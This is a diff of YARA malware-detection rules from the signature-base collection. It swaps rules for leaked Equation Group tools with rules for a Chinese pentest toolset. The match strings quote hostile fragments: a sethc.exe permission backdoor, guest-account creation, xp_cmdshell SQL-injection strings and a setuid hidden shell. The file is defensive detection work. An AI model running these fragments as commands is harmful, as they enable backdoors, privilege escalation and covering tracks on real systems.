 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "719baa53db53f4cc4f3e9ed935814e42e5cb4b7fb8eaaa373feb73df69bfcde0"
-		score = 75
+		hash = "5a1226e73daba516c889328f295e728f07fdf1c3"
+		logic_hash = "d693b880d5419277d9189d44ace60fe5f328b4662c1975a8bc97e63dc073d1e6"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
-		hash2 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
 
 	strings:
-		$s1 = "# default is to dump out all scanned hosts found" fullword ascii
-		$s2 = "$bool .= \" -r \" if (/mibiisa.* -r/);" fullword ascii
-		$s3 = "sadmind is available on two ports, this also works)" fullword ascii
-		$s4 = "-x IP      gives \\\"hostname:# users:load ...\\\" if positive xwin scan" fullword ascii
+		$s1 = "\\sethc.exe /G everyone:F" ascii
+		$s2 = "net1 user guest guest123!@#" fullword ascii
+		$s3 = "\\dllcache\\sethc.exe" ascii
+		$s4 = "sathc.exe 211" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 40KB and 1 of them ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1030KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup__Funnelout_V4_1_0_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Cleaniis : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl"
+		description = "Sample from CN Honker Pentest Toolset - file cleaniis.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0c42b06-8314-5731-b333-59bb90785cf4"
-		date = "2017-04-08"
+		id = "75f3c33a-e3b8-57bc-a3fd-f8b6491388d8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L952-L969"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1575-L1590"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ae0b387725017de2766593ea55677dca36eee68107e0692a7d5e2526db74765b"
-		score = 75
+		hash = "372bc64c842f6ff0d9a1aa2a2a44659d8b88cb40"
+		logic_hash = "6f3fe22c9ce8b576116a3fc185910488f37b687c1158d49a93feaa68a144a8db"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash2 = "457ed14e806fdbda91c4237c8dc058c55e5678f1eecdd78572eff6ca0ed86d33"
 
 	strings:
-		$s1 = "header(\"Set-Cookie: bbsessionhash=\" . \\$hash . \"; path=/; HttpOnly\");" fullword ascii
-		$s2 = "if ($code =~ /proxyhost/) {" fullword ascii
-		$s3 = "\\$rk[1] = \\$rk[1] - 1;" ascii
-		$s4 = "#existsUser($u) or die \"User '$u' does not exist in database.\\n\";" fullword ascii
+		$s1 = "iisantidote <logfile dir> <ip or string to hide>" fullword ascii
+		$s4 = "IIS log file cleaner by Scurt" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup__Magicjack_V1_1_0_0_Client : FILE
+rule SIGNATURE_BASE_CN_Honker_Arp3_7_Arp3_7 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py"
+		description = "Sample from CN Honker Pentest Toolset - file arp3.7.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be18f36c-3d6c-53a3-89b6-bfc53e1dd87d"
-		date = "2017-04-08"
+		id = "a4aeefaf-a097-5ba3-a18f-54a1b9752883"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L971-L988"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1592-L1607"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e22b01aa9b1283fa7a326b7c0f8047ed373fac750c89e9ba02c49f0f454e275"
-		score = 75
+		hash = "db641a9dfec103b98548ac7f6ca474715040f25c"
+		logic_hash = "9930d5f13c4dc5cae25dece811911e71e858e3fef51a09c99883699e7feb4908"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
 
 	strings:
-		$s1 = "temp = ((left >> 1) ^ right) & 0x55555555" fullword ascii
-		$s2 = "right ^= (temp <<  16) & 0xffffffff" fullword ascii
-		$s3 = "tempresult = \"\"" fullword ascii
-		$s4 = "num = self.bytes2long(data)" fullword ascii
+		$s1 = "CnCerT.Net.SKiller.exe" fullword wide
+		$s2 = "www.80sec.com" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 80KB and 3 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup__Ftshell : FILE
+rule SIGNATURE_BASE_CN_Honker_Exp_Ms11080 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
+		description = "Sample from CN Honker Pentest Toolset - file ms11080.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
-		date = "2017-04-08"
+		id = "2f5ce2f3-3595-5729-be0c-3f6486cb94fd"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L990-L1007"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1609-L1624"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "84c646b2c81f870f650fafd26471017b00b3b7020e72390f818304958e694572"
-		score = 75
+		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
+		logic_hash = "57eb1cdd1108c82da399b0aa869edc9e377e0185896504716bec8925599c07f0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
-		hash4 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
 
 	strings:
-		$s1 = "if { [string length $uRemoteUploadCommand]" fullword ascii
-		$s2 = "processUpload" fullword ascii
-		$s3 = "global dothisreallyquiet" fullword ascii
+		$s2 = "[*] command add user 90sec 90sec" fullword ascii
+		$s6 = "[*] Add to Administrators success" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 840KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Store_Linux_I386_V_3_3_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Injection_Transit : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file Injection_transit.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b88be148-5308-583a-b41e-2bea9b837e2a"
-		date = "2017-04-09"
+		id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1018-L1033"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1626-L1642"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f284c2fecee23f01f83e0534d7d56a88b102e6dcc02a26321fe246604dc8cb0e"
-		score = 75
+		hash = "f4fef2e3d310494a3c3962a49c7c5a9ea072b2ea"
+		logic_hash = "3e6fe804b9b6e8555c847a165bb0a8b266004653531fe8f11e3937108757f2ff"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "abc27fda9a0921d7cf2863c29768af15fdfe47a0b3e7a131ef7e5cc057576fbc"
 
 	strings:
-		$s1 = "[-] Failed to map file: %s" fullword ascii
-		$s2 = "[-] can not NULL terminate input data" fullword ascii
-		$s3 = "[!] Name has size of 0!" fullword ascii
+		$s0 = "<description>Your app description here</description> " fullword ascii
+		$s4 = "Copyright (C) 2003 ZYDSoft Corp." fullword wide
+		$s5 = "ScriptnackgBun" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 60KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3175KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Genkey : FILE
+rule SIGNATURE_BASE_CN_Honker_Safe3Wvs : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file Safe3WVS.EXE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb305be7-9e16-502e-89ca-a40bb6890404"
-		date = "2017-04-09"
+		id = "035ecb73-3dbc-55d2-8d0c-b71308094d18"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1035-L1049"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1644-L1662"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c1d823e297b0b1f47f12a3240d59f5ecc482f1140e5b2962f76ec2fff719664a"
-		score = 75
+		hash = "fee3acacc763dc55df1373709a666d94c9364a7f"
+		logic_hash = "803591fa9427c3001f78ae6274076f3a2f070770d568909d6cba8cee5124ee4c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0ce455fb7f46e54a5db9bef85df1087ff14d2fc60a88f2becd5badb9c7fe3e89"
 
 	strings:
-		$x1 = "rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')" fullword ascii
-		$x2 = "client_auth = binascii.hexlify(lo_execute('openssl rand 16'))" fullword ascii
+		$s0 = "2TerminateProcess" fullword ascii
+		$s1 = "mscoreei.dll" fullword ascii
+		$s7 = "SafeVS.exe" fullword wide
+		$s8 = "www.safe3.com.cn" fullword wide
+		$s20 = "SOFTWARE\\Classes\\Interface\\" ascii
 
 	condition:
-		( filesize < 3KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cursetingle_2_0_1_2_Mswin32_V_2_0_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_NBSI_3_0 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7a1870ba-d600-5c11-8d3d-41395ad8be63"
-		date = "2017-04-09"
+		id = "be8d0dce-4f7f-5f18-9ed0-99fc1dc2b22f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1051-L1065"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1664-L1681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bc27edc946beb5065d4fe43e53a33b448c24c7dd3eae0cedd4770c02fce7836b"
-		score = 75
-		quality = 85
+		hash = "93bf0f64bec926e9aa2caf4c28df9af27ec0e104"
+		logic_hash = "017b5f76a3168089f3186134e7a4c0352158bb866228776240f0d014834e6ee0"
+		score = 70
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "614bf159b956f20d66cedf25af7503b41e91841c75707af0cdf4495084092a61"
 
 	strings:
-		$s1 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
-		$s2 = "0123456789abcdefABCEDF:" fullword ascii
+		$s1 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
+		$s2 = "http://localhost/1.asp?id=16" fullword ascii
+		$s3 = " exec master.dbo.xp_cmdshell @Z--" fullword wide
+		$s4 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2600KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cursesleepy_Mswin32_V_1_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_Dubrute_V3_0_RC3_2_0 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file 2.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f60ff218-1cb7-5f44-a756-1ee67649e6a6"
-		date = "2017-04-09"
+		id = "dda5eea9-da79-5f1f-bbac-9f05ba7e71c9"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1067-L1082"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1683-L1699"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0dcbf2b314ff9c392ae0cb4f14762dd20c6b85f7f547af683db3aea1c57dee57"
-		score = 75
+		hash = "e8ee982421ccff96121ffd24a3d84e3079f3750f"
+		logic_hash = "8c9be7e8cc04eba6b131acc3c85ac48d7663260a2e4064ad55ed8f40e0875cf4"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6293439b4b49e94f923c76e302f5fc437023c91e063e67877d22333f05a24352"
 
 	strings:
-		$s1 = "A}%j,R" fullword ascii
-		$op1 = { a1 e0 43 41 00 8b 0d 34 44 41 00 6b c0 }
-		$op2 = { 33 C0 F3 A6 74 14 8B 5D 08 8B 4B 34 50 }
+		$s0 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
+		$s3 = "Create %d IP@Loginl;Password" fullword ascii
+		$s15 = "UBrute.com" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 980KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cursehelper_Win2K_I686_V_2_2_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Hkmjjiis6 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file hkmjjiis6.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1c24aa6a-74ab-5832-876b-5cab43dc6bb7"
-		date = "2017-04-09"
-		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1084-L1100"
+		id = "badf8224-4f09-57aa-ab16-0d70e0b3f88c"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1701-L1718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f6c92fc3540750a1223682b1672575b3a3120f5ebf63190a9b31d7e4e5ce13c7"
-		score = 75
+		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
+		logic_hash = "a087b9731444152b717e0fbae557004d94f3fb69a4ec65aa38b7a3dab3e3cddf"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5ac6fde8a06f4ade10d672e60e92ffbf78c4e8db6b5152e23171f6f53af0bfe1"
 
 	strings:
-		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}" fullword ascii
-		$op1 = { 8d b5 48 ff ff ff 89 34 24 e8 56 2a 00 00 c7 44 }
-		$op2 = { e9 a2 f2 ff ff ff 85 b4 fe ff ff 8b 95 a8 fe ff }
+		$s14 = "* FROM IIsWebInfo/r" fullword ascii
+		$s19 = "ltithread4ck/" ascii
+		$s20 = "LookupAcc=Sid#" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 175KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Addkey : FILE
+rule SIGNATURE_BASE_CN_Honker_Clearlogs : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file clearlogs.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a025e379-c24e-56ac-b53c-bd38d51f3437"
-		date = "2017-04-09"
-		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1102-L1117"
+		id = "bfbc339e-5530-5984-94de-be1002f09ca1"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1720-L1736"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec5b7499e3c3cc6b581c381ae61a4c987691c0d93dd589a5907fd7419335963a"
-		score = 75
+		hash = "490f3bc318f415685d7e32176088001679b0da1b"
+		logic_hash = "ed961d2850ba86743177976a4516e7d4a8b90b7e8f180c03f5dbbcc794ad1084"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6c67c03716d06a99f20c1044585d6bde7df43fee89f38915db0b03a42a3a9f4b"
 
 	strings:
-		$x1 = "print '  -s storebin  use storebin as the Store executable\\n'" fullword ascii
-		$x2 = "os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))" fullword ascii
-		$x3 = "print '  -k keyfile   the key text file to inject'" fullword ascii
+		$s2 = "- http://ntsecurity.nu/toolbox/clearlogs/" ascii
+		$s4 = "Error: Unable to clear log - " fullword ascii
 
 	condition:
-		( filesize < 20KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Noclient_3_3_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_No_Net_Priv_Esc_Adduser : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file AddUser.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be7c4263-e8e3-5a83-9003-063225e544ff"
-		date = "2017-04-09"
+		id = "0f99914c-9349-5870-a3e0-3a5079efdecf"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1119-L1136"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1738-L1754"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "14b1f135da81fd9a071e0f692bc7f1ab6f6f63d7dd05e1557e5c2d51135727b6"
-		score = 75
+		hash = "4c95046be6ae40aee69a433e9a47f824598db2d4"
+		logic_hash = "743e67e2aa95830034db1afda1f346c30467c7b59e030ed27415e5127013be74"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72"
 
 	strings:
-		$x1 = "127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning" fullword ascii
-		$x2 = "iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;" fullword ascii
-		$x3 = "noclient: failed to execute %s: %s" fullword ascii
-		$x4 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
-		$s5 = "Attempting connection from 0.0.0.0:" ascii
+		$s0 = "PECompact2" fullword ascii
+		$s1 = "adduser" fullword ascii
+		$s5 = "OagaBoxA" fullword ascii
 
 	condition:
-		( filesize < 1000KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 115KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Curseflower_Mswin32_V_1_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Injection : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file Injection.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4138f87a-4584-5efc-a168-633838893e2f"
-		date = "2017-04-09"
+		id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1138-L1153"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1756-L1771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e70954945b3a5e08e5ae216b16702056b403dbf14391276eae1ed13e8273c1ee"
-		score = 75
+		hash = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
+		logic_hash = "8de3e59bd118fbbf1a012c6bfb358dba7c8fb758e3ac17277f2ad3a92c0284ba"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fdc452629ff7befe02adea3a135c3744d8585af890a4301b2a10a817e48c5cbf"
 
 	strings:
-		$s1 = "<pVt,<et(<st$<ct$<nt" fullword ascii
-		$op1 = { 6a 04 83 c0 08 6a 01 50 e8 10 34 00 00 83 c4 10 }
+		$s0 = "http://127.0.0.1/6kbbs/bank.asp" fullword ascii
+		$s7 = "jmPost.asp" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Tmpwatch : FILE
+rule SIGNATURE_BASE_CN_Honker_Sqlserver_Inject_Creaked : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file SQLServer_inject_Creaked.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2c8cac7a-761f-59f4-bc04-285af4dbe184"
-		date = "2017-04-09"
+		id = "9a8a77c2-9e06-5694-8055-4480ab932520"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1155-L1169"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1773-L1788"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6fab5100f6ee0bf9a4e13e262c8d47e600f5aad64c7e04fe08fa42a5d78c38e8"
-		score = 75
+		hash = "af3c41756ec8768483a4cf59b2e639994426e2c2"
+		logic_hash = "2a7e913a4b7bb6c1270d862108eae7ed3998114b672ca7fa19bd0b199fc27dc2"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "65ed8066a3a240ee2e7556da74933a9b25c5109ffad893c21a626ea1b686d7c1"
 
 	strings:
-		$s1 = "chown root:root /tmp/.scsi/dev/bin/gsh" fullword ascii
-		$s2 = "chmod 4777 /tmp/.scsi/dev/bin/gsh" fullword ascii
+		$s1 = "http://localhost/index.asp?id=2" fullword ascii
+		$s2 = "Email:zhaoxypass@yahoo.com.cn<br>" fullword ascii
 
 	condition:
-		( filesize < 1KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 8110KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Orleans_Stride_Sunos5_9_V_2_4_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webscan_Webscan : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file WebScan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec83e1c0-91a9-5f9d-a1d2-94be725bc05a"
-		date = "2017-04-09"
+		id = "1545494b-9a74-5b2e-921c-e54dd5ac4b51"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1171-L1186"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1790-L1805"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1380b22e661926ebb2878d89c80e115a58d0bfc060681a55564c97c1e9f36765"
-		score = 75
+		hash = "a0b0e2422e0e9edb1aed6abb5d2e3d156b7c8204"
+		logic_hash = "a714fe90dce33180b8074e2c3a16fc1829ed2a7b387eb92aec8a147cff9e57a4"
+		score = 70
 		quality = 85
 		tags = "FILE"
